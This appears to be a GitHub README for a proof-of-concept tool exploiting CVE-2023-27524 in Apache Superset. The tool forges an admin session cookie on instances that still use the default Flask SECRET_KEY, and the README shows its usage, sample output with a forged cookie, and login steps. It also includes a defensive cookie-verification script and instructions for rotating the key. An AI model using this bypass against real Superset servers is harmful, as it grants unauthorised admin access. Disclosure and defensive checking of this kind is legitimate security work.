MaanVader/CVE-2023-27524-POC
CVE-2023-27524: Apache Superset Auth Bypass

Script that checks whether an Apache Superset server is vulnerable to CVE-2023-27524 (the instance is still running with the default Flask SECRET_KEY) and, if it is, forges a session cookie with user_id = 1, which is usually the admin user, bypassing authentication and giving access to the dashboard. At the time of writing, about 3000 servers worldwide are running Apache Superset.

Usage

usage: python3 CVE-2023-27524.py --url URL

Basic Example

% python3 CVE-2023-27524.py --url http://10.1.221.202:8080   
Got session cookie: eyJjc3JmX3Rva2VuIjoiZDBiYWI5ZmU0YTRjOWFiM2ZkMjc2YjA2ZDZiNWE0MDZmZmNkN2JkOCIsImxvY2FsZSI6ImVuIn0.ZEc0tw.X6y_rTie0yMP5oTFC6KNq8Me9ek
Decoded session cookie: {'csrf_token': 'd0bab9fe4a4c9ab3fd276b06d6b5a406ffcd7bd8', 'locale': 'en'}
Superset Version: 2.0.1
Vulnerable to CVE-2023-27524 - Using default SECRET_KEY: b'CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET'
Forged session cookie for user 1: eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZEc0tw.xmzJjq757QujOpk65jK0dLgCSDg
Now visit the url: `http://10.1.221.202:8080/superset/welcome` and replace the current session cookie with this `eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZEc0tw.xmzJjq757QujOpk65jK0dLgCSDg` and refresh the page and we will be logged in as admin to the dashboard
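The check the script performs can be reproduced on your own deployment without the PoC: take a session cookie issued by your Superset instance and see whether it validates under the shipped default key. The following is an added example, not code from this repository; it uses only the standard library and assumes Flask's standard session-cookie format (payload.timestamp.signature, HMAC-SHA1 with the signing key derived from SECRET_KEY and the salt "cookie-session"), which Superset inherits from Flask.

```python
import base64
import hashlib
import hmac
import json
import zlib

# Default SECRET_KEY reported in the output above; extend this list with any
# other placeholder keys your deployment history may have used.
DEFAULT_SECRET_KEYS = [b"CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET"]

# Forged cookie taken from the example output above, used for the demo run.
FORGED_COOKIE = "eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZEc0tw.xmzJjq757QujOpk65jK0dLgCSDg"


def _b64decode(data: str) -> bytes:
    """Decode the unpadded URL-safe base64 that itsdangerous emits."""
    return base64.urlsafe_b64decode(data + "=" * (-len(data) % 4))


def _derive_key(secret_key: bytes, salt: bytes = b"cookie-session") -> bytes:
    # Flask signs with HMAC-SHA1(secret_key, salt) as the key, not the raw secret.
    return hmac.new(secret_key, salt, hashlib.sha1).digest()


def verify_session_cookie(cookie: str, secret_key: bytes):
    """Return the session dict if `cookie` validates under `secret_key`, else None."""
    signed_value, sep, signature = cookie.rpartition(".")
    payload, sep2, _timestamp = signed_value.rpartition(".")
    if not (sep and sep2 and payload):
        return None
    try:
        # The signature covers "payload.timestamp"; compare in constant time.
        expected = hmac.new(_derive_key(secret_key), signed_value.encode(), hashlib.sha1).digest()
        if not hmac.compare_digest(expected, _b64decode(signature)):
            return None  # signed with a different key, or tampered
        raw = _b64decode(payload.lstrip("."))
        if payload.startswith("."):  # leading "." marks a zlib-compressed payload
            raw = zlib.decompress(raw)
        return json.loads(raw)
    except (ValueError, zlib.error):
        return None


def find_default_key(cookie: str):
    """Return the default key that validates `cookie`, or None if none does."""
    for key in DEFAULT_SECRET_KEYS:
        if verify_session_cookie(cookie, key) is not None:
            return key
    return None


if __name__ == "__main__":
    key = find_default_key(FORGED_COOKIE)
    print("default SECRET_KEY in use:" if key else "no default key matched", key or "")
```

A match means every session on that instance can be minted by anyone who knows the default, so rotate the key as described under Mitigations and invalidate existing sessions.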

Mitigations

Follow the instructions here to generate and configure a strong, random Flask SECRET_KEY. The superset CLI can rotate the SECRET_KEY (set PREVIOUS_SECRET_KEY to the old value, set the new SECRET_KEY, then run `superset re-encrypt-secrets`) so that existing encrypted database connection information is preserved. Existing sessions signed with the old key become invalid after rotation, which is the desired outcome when the old key was the default.

Disclaimer

This POC is created for educational purposes only.

Reference
